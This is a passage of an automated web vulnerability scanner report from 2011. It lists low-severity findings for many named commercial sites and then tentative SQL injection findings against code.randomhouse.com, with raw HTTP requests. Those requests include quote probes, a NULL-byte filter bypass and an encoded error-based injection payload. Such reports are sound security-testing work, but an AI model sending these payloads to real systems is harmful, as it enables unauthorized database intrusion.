25.28. http://www.facebook.com/plugins/like.php

25.29. http://www.facebook.com/plugins/like.php

25.30. http://www.facebook.com/plugins/like.php

25.31. http://www.facebook.com/plugins/like.php

25.32. http://www.facebook.com/plugins/like.php

25.33. http://www.google.com/sdch/rU20-FBA.dct

25.34. http://www.realtor.com/search/widgetportal/Widget.aspx

26. Robots.txt file

26.1. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

26.2. http://amch.questionmarket.com/adsc/d890935/20/892222/randm.js

26.3. http://api.bing.com/qsonhs.aspx

26.4. http://b.scorecardresearch.com/b

26.5. http://b.voicefive.com/b

26.6. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

26.7. http://fonts.googleapis.com/css

26.8. http://freemanco.com/

26.9. http://investing.money.msn.com/mv/MarketStatus

26.10. http://l.addthiscdn.com/live/t00/120lo.gif

26.11. http://money.msn.com/

26.12. http://moneycentral.msn.com/inc/css/ww.css

26.13. http://moxieinsight.com/

26.14. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.15. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

26.16. http://rad.msn.com/ADSAdClient31.dll

26.17. http://s7.addthis.com/js/addthis_widget.php

26.18. http://spe.atdmt.com/ds/AANYCCITICIT/2011_Continuity_Revised/BND_Trapeze2011_FL_300x250_RV2_MSN.swf

26.19. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

26.20. http://themes.googleusercontent.com/font

26.21. http://www.actonsoftware.com/acton/bn/1091/visitor.gif

26.22. https://www.bcbst.com/accounttools/public/askUserId.do

26.23. http://www.freemanco.com/store

26.24. https://www.freemanco.com/store/index.jsp

26.25. http://www.interspire.com/activekb/

26.26. http://www.itasoftware.com/style.css

26.27. http://www.magellangps.com/

26.28. http://www.msn.com/

26.29. http://www.omniture.com/en/products/conversion/testandtarget

27. Cacheable HTTPS response

27.1. https://checkout.netsuite.com/empty.html

27.2. https://ecommerce.randomhouse.com//account.do

27.3. https://ecommerce.randomhouse.com//create-address.do

27.4. https://ecommerce.randomhouse.com//email-password.do

27.5. https://ecommerce.randomhouse.com//select-address.do

27.6. https://ecommerce.randomhouse.com//view-orders.do

27.7. https://ecommerce.randomhouse.com/account.do

27.8. https://ecommerce.randomhouse.com/address-validator.do

27.9. https://ecommerce.randomhouse.com/create-account-submit.do

27.10. https://ecommerce.randomhouse.com/create-account.do

27.11. https://ecommerce.randomhouse.com/password.do

27.12. https://ecommerce.randomhouse.com/sign-in-submit.do

27.13. https://ecommerce.randomhouse.com/sign-in.do

27.14. https://my.omniture.com/login/

27.15. https://myaccount.west.thomson.com/MYACCOUNT/css/font/knowledgelight-webfont-2010.ttf

27.16. https://secure.bundle.com/XmlContent/Carouselpage.xml

27.17. https://west.thomson.com/noexpire/font/knowledgebold-webfont-2010.woff

27.18. https://west.thomson.com/noexpire/font/knowledgelight-webfont-2010.woff

27.19. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx

27.20. https://west.thomson.com/store/secure/EmptyBasket.aspx

27.21. https://west.thomson.com/store/secure/ShippingInfo.aspx

27.22. https://west.thomson.com/support/customer-service/order-info.aspx

27.23. https://www.bcbst.com/accounttools/public/askUserId.do

27.24. https://www.bcbst.com/brokers/dental/

27.25. https://www.bcbst.com/brokers/group/

27.26. https://www.bcbst.com/brokers/individual/

27.27. https://www.bcbst.com/employers/dental/

27.28. https://www.bcbst.com/employers/vision/

27.29. https://www.bcbst.com/inc/loginform.asp

27.30. https://www.bcbst.com/members/

27.31. https://www.bcbst.com/members/dental/

27.32. https://www.bcbst.com/members/vision/

27.33. https://www.bcbst.com/secure/public/InvalidAccess.shtm

27.34. https://www.bcbst.com/secure/public/login.asp

27.35. https://www.freemanco.com/store/checkout/includes/stateRestriction.jsp

27.36. https://www.freemanco.com/store/index.jsp

27.37. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

27.38. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

28. HTML does not specify charset

28.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14

28.2. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

28.3. http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21

28.4. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105

28.5. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25

28.6. http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome

28.7. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php

28.8. http://amch.questionmarket.com/adscgen/st.php

28.9. http://analytics.live.com/Sync.html

28.10. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

28.11. http://fls.doubleclick.net/activityi

28.12. http://freemanco.com/

28.13. http://g.adspeed.net/ad.php

28.14. http://kbportal.thomson.com/display/2/_dividerFrame.html

28.15. http://kbportal.thomson.com/display/2/leftframe_files/_greybar.html

28.16. http://kbportal.thomson.com/pc/12/categoryList/21/2/cat_index.html

28.17. http://kbportal.thomson.com/pc/12/categoryList/88/2/cat_index.html

28.18. http://mediacdn.disqus.com/1303851120/build/system/def.html

28.19. http://mediacdn.disqus.com/1303851120/build/system/reply.html

28.20. http://mediacdn.disqus.com/1303851120/build/system/upload.html

28.21. http://moxieinsight.com/

28.22. http://now.eloqua.com/visitor/v200/svrGP.aspx

28.23. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

28.24. http://recs.richrelevance.com/favicon.ico

28.25. http://support.moxiesoft.com/

28.26. http://video.od.visiblemeasures.com/log

28.27. http://view.c3metrics.com/v.js

28.28. http://wd.sharethis.com/api/getApi.php

28.29. http://www.bcbst.com/inc/loginform.asp

28.30. https://www.bcbst.com/inc/loginform.asp

29. Content type incorrectly stated

29.1. http://a.rad.msn.com/ADSAdClient31.dll

29.2. http://ac3.msn.com/de.ashx

29.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

29.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

29.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

29.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

29.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

29.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

29.9. http://amch.questionmarket.com/adsc/d743529/2/743550/randm.js

29.10. http://amch.questionmarket.com/adsc/d743529/3/743551/randm.js

29.11. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php

29.12. http://amch.questionmarket.com/adscgen/st.php

29.13. http://ar.voicefive.com/b/rc.pli

29.14. http://b.rad.msn.com/ADSAdClient31.dll

29.15. http://blstc.msn.com/br/chan/css/cntwmodule.2010.29.09.css

29.16. http://blstj.msn.com/br/chan/js/chan_slidesurvey.2008.01.02.js

29.17. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

29.18. http://freemanco.app5.hubspot.com/salog.js.aspx

29.19. http://images.west.thomson.com/buttons/tr_logo_small.jpg

29.20. http://img.icbdr.com/MediaManagement/3J/Mwg7SF78N5DWGML7B3J.jpg

29.21. http://img.icbdr.com/MediaManagement/91/MVM8635VX05HXYWXW91.jpg

29.22. http://img.icbdr.com/images/custom/msn/Calculator2.jpg

29.23. http://img.icbdr.com/images/custom/msn/Socialmediaoverload.jpg

29.24. http://img.icbdr.com/images/custom/msn/words.jpg

29.25. http://img1.newser.com/image/106040-0-20080520120727.jpeg

29.26. http://img1.newser.com/image/5830-0-20070530122616.jpeg

29.27. http://img1.newser.com/image/6028-0-20070530123754.jpeg

29.28. http://img1.newser.com/image/94280-0-20080414104938.jpeg

29.29. http://img2.newser.com/image/6211-0-20070530125015.jpeg

29.30. http://investing.money.msn.com/mv/MarketStatus

29.31. http://investing.money.msn.com/mv/RecentQuotes/

29.32. http://kbportal.thomson.com/display/2/homepage.aspx

29.33. http://lifestyle.msn.com/FeedPageFinal.aspx

29.34. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

29.35. http://matrix.itasoftware.com/favicon.ico

29.36. http://matrix.itasoftware.com/geosearch/service/json/suggest/citiesAndAirports

29.37. https://myaccount.west.thomson.com/MYACCOUNT/Scripts/globinfo/jQuery.glob.all.min.js

29.38. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.39. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

29.40. http://pub2.widgetbox.com/css/fonts/LithoAntique-DemiBold-webfont.woff

29.41. http://pub2.widgetbox.com/images/favicon.ico

29.42. http://rad.msn.com/ADSAdClient31.dll

29.43. http://s7.addthis.com/js/addthis_widget.php

29.44. http://sales.liveperson.net/hcp/html/mTag.js

29.45. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

29.46. http://survey.112.2o7.net/survey/dynamic/suites/274/omniturecom/list.js

29.47. http://video.od.visiblemeasures.com/log

29.48. http://view.c3metrics.com/v.js

29.49. http://vms.msn.com/vms.aspx

29.50. http://wd.sharethis.com/api/getApi.php

29.51. http://widgetserver.com/favicon.ico

29.52. http://www.allpages.com/css/favicon.ico

29.53. http://www.aptm.phoenix.edu/AptiNet/DynamicSelect

29.54. http://www.bcbst.com/billboard/mobile.jpg

29.55. https://www.bcbst.com/accounttools/public/0

29.56. http://www.bing.com/sck

29.57. http://www.cargill.com/wcm/fragments/ccom_home_flash_static_list/slideshow.swf

29.58. http://www.cargill.com/wcm/fragments/ccom_landing_flash_static_list/slideshow_650x292.swf

29.59. http://www.cargill.com/wcm/groups/public/@ss-assets/documents/script/ccom_home_flash_param_gen_params_NextRowSS_DATAFILE-val-NA3025330-pmr-pageLevel-val-1.jsp

29.60. http://www.cargill.com/wcm/groups/public/@ss-assets/documents/script/ccom_landing_flash_param_gen_params_NextRowSS_DATAFILE-val-NA3018658-pmr-pageLevel-val-2.jsp

29.61. http://www.freemanco.com/store/global/util/stateRestriction.jsp

29.62. http://www.freemanco.com/store/includes/ajax/loginOrNot.jsp

29.63. https://www.freemanco.com/store/checkout/includes/stateRestriction.jsp

29.64. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

29.65. http://www.google.com/search

29.66. http://www.itasoftware.com/favicon.ico

29.67. http://www.itasoftware.com/scripts/highslide/graphics/zoomout.cur

29.68. http://www.omniture.com/listener.html

29.69. http://www.omniture.com/modules/creative_zones/display.html

29.70. http://www.omniture.com/modules/json/picklist.json.php

29.71. http://www.randomhouse.com/art/bw06/base/top_right_corner.png

29.72. http://www.res-x.com/ws/r2/Resonance.aspx

30. Content type is not specified

30.1. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

30.2. http://realestate.msn.us.intellitxt.com/favicon.ico

31. SSL certificate

31.1. https://my.omniture.com/

31.2. https://www.bcbst.com/

31.3. https://www.freemanco.com/



1. SQL injection
There are 19 instances of this issue:


1.1. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s72574234255265 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhcorporate,ranhrollup/1/H.17/s72574234255265

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/ranhcorporate,ranhrollup/1/H.17/s72574234255265?AQB=1&ndh=1&t=26/3/2011%2017%3A16%3A38%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=https%3A//seal.verisign.com/splash&pid=cart&pidt=1&oid=https%3A//seal.verisign.com/splash%3Fform_file%3Dfdf/splash.fdf%26dn%3Decommerce.randomhouse.com%26lang%3Den&ot=A&oi=163&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:31:57 GMT
Server: Omniture DC/2.0.0
Content-Length: 451
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ranhcorporate,ranhrollup/1/H.17/s7257423425526
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ranhcorporate,ranhrollup/1/H.17/s72574234255265?AQB=1&ndh=1&t=26/3/2011%2017%3A16%3A38%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=https%3A//seal.verisign.com/splash&pid=cart&pidt=1&oid=https%3A//seal.verisign.com/splash%3Fform_file%3Dfdf/splash.fdf%26dn%3Decommerce.randomhouse.com%26lang%3Den&ot=A&oi=163&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:31:57 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html


1.2. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s74819229580448 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhcorporate,ranhrollup/1/H.17/s74819229580448

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/ranhcorporate,ranhrollup/1/H.17/s74819229580448?AQB=1&ndh=1&t=26/3/2011%2017%3A16%3A38%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&events=scView&c1=Random%20House%20Corporate&v12=%27%20and%20row%281%2C1%29%3E%28select%20count%28*%29%2Cconcat%28CONCAT%28CHAR%2895%29%2CCHAR%2833%29%2CCHAR%2864%29%2CCHAR%2852%29%2CCHAR%28100%29%2CCHAR%28105%29%2CCHAR%28108%29%2CCHAR%28101%29%2CCHAR%28109%29%2CCHAR%28109%29%2CCHAR%2897%29%29%2C0x3a%2Cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%20or%20%271%27%3D%27&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:29:42 GMT
Server: Omniture DC/2.0.0
Content-Length: 451
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ranhcorporate,ranhrollup/1/H.17/s7481922958044
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ranhcorporate,ranhrollup/1/H.17/s74819229580448?AQB=1&ndh=1&t=26/3/2011%2017%3A16%3A38%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&events=scView&c1=Random%20House%20Corporate&v12=%27%20and%20row%281%2C1%29%3E%28select%20count%28*%29%2Cconcat%28CONCAT%28CHAR%2895%29%2CCHAR%2833%29%2CCHAR%2864%29%2CCHAR%2852%29%2CCHAR%28100%29%2CCHAR%28105%29%2CCHAR%28108%29%2CCHAR%28101%29%2CCHAR%28109%29%2CCHAR%28109%29%2CCHAR%2897%29%29%2C0x3a%2Cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%20or%20%271%27%3D%27&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:29:43 GMT
Server: Omniture DC/2.0.0
xserver: www440
Content-Length: 0
Content-Type: text/html


1.3. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79384069200516 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhcorporate,ranhrollup/1/H.17/s79384069200516

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /b/ss/ranhcorporate,ranhrollup/1%00'/H.17/s79384069200516?AQB=1&ndh=1&t=26/3/2011%2017%3A7%3A42%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=https%3A//seal.verisign.com/splash&pid=cart&pidt=1&oid=https%3A//seal.verisign.com/splash%3Fform_file%3Dfdf/splash.fdf%26dn%3Decommerce.randomhouse.com%26lang%3Den&ot=A&oi=146&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:13:47 GMT
Server: Omniture DC/2.0.0
Content-Length: 429
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/ranhcorporate,ranhrollup/1 was not found on thi
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/ranhcorporate,ranhrollup/1%00''/H.17/s79384069200516?AQB=1&ndh=1&t=26/3/2011%2017%3A7%3A42%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=https%3A//seal.verisign.com/splash&pid=cart&pidt=1&oid=https%3A//seal.verisign.com/splash%3Fform_file%3Dfdf/splash.fdf%26dn%3Decommerce.randomhouse.com%26lang%3Den&ot=A&oi=146&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:13:47 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html


1.4. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s75506922125350 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhrollup/1/H.22.1/s75506922125350

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/ranhrollup/1/H.22.1/s75506922125350?AQB=1&ndh=1&t=26%2F3%2F2011%2017%3A19%3A25%202%20300&ns=randomhouse&pageName=about%3Acontact.html%3A%3A&g=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Fcontact.html&cc=USD&ch=about&events=event8&c24=www.randomhouse.com%2Fabout%2F&v24=www.randomhouse.com%2Fabout%2F&c25=www.randomhouse.com%2Fabout%2F&v25=www.randomhouse.com%2Fabout%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: code.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/about/contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; s_sq=%5B%5BB%5D%5D; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; SC_LINKS=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:57:40 GMT
Server: Omniture DC/2.0.0
Content-Length: 439
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ranhrollup/1/H.22.1/s75506922125350 was not fo
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ranhrollup/1/H.22.1/s75506922125350?AQB=1&ndh=1&t=26%2F3%2F2011%2017%3A19%3A25%202%20300&ns=randomhouse&pageName=about%3Acontact.html%3A%3A&g=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Fcontact.html&cc=USD&ch=about&events=event8&c24=www.randomhouse.com%2Fabout%2F&v24=www.randomhouse.com%2Fabout%2F&c25=www.randomhouse.com%2Fabout%2F&v25=www.randomhouse.com%2Fabout%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: code.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/about/contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; s_sq=%5B%5BB%5D%5D; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; SC_LINKS=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:57:40 GMT
Server: Omniture DC/2.0.0
xserver: www287
Content-Length: 0
Content-Type: text/html


1.5. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s79787087680306 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhrollup/1/H.22.1/s79787087680306

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/ranhrollup/1/H.22.1/s79787087680306?AQB=1&ndh=1&t=26%2F3%2F2011%2017%3A19%3A47%202%20300&ns=randomhouse&pageName=about%3Afaq%3Aindex.php%3A%3A&g=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Ffaq%2Findex.php%3FToDo%3Dcontact&r=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Fcontact.html&cc=USD&ch=about%2Ffaq&events=event8&c17=about%3Acontact.html%3A%3A&c18=e-mail%20Customer%20Service&c19=about%3Acontact.html%3A%3A%20%7C%20e-mail%20Customer%20Service&c24=www.randomhouse.com%2Fabout%2F&v24=www.randomhouse.com%2Fabout%2F&c25=www.randomhouse.com%2Fabout%2Ffaq%2F&v25=www.randomhouse.com%2Fabout%2Ffaq%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=about%3Acontact.html%3A%3A&pidt=1&oid=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Ffaq%2Findex.php%3FToDo%3Dcontact&ot=A&AQE=1 HTTP/1.1
Host: code.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/about/faq/index.php?ToDo=contact
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; s_sq=ranhrollup%3D%2526pid%253Dabout%25253Acontact.html%25253A%25253A%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.randomhouse.com%25252Fabout%25252Ffaq%25252Findex.php%25253FToDo%25253Dcontact%2526ot%253DA; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; SC_LINKS=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
